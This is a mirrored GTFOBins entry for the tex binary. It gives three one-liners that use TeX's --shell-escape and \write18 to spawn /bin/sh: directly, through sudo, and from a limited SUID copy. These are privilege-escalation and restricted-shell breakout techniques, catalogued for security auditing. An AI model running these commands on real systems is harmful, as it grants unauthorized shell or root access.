1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/tex.md
2021-04-26 16:07:59 +02:00

13 lines
254 B
Markdown

---
functions:
shell:
- code: |
tex --shell-escape '\write18{/bin/sh}\end'
sudo:
- code: |
sudo tex --shell-escape '\write18{/bin/sh}\end'
limited-suid:
- code: |
./tex --shell-escape '\write18{/bin/sh}\end'
---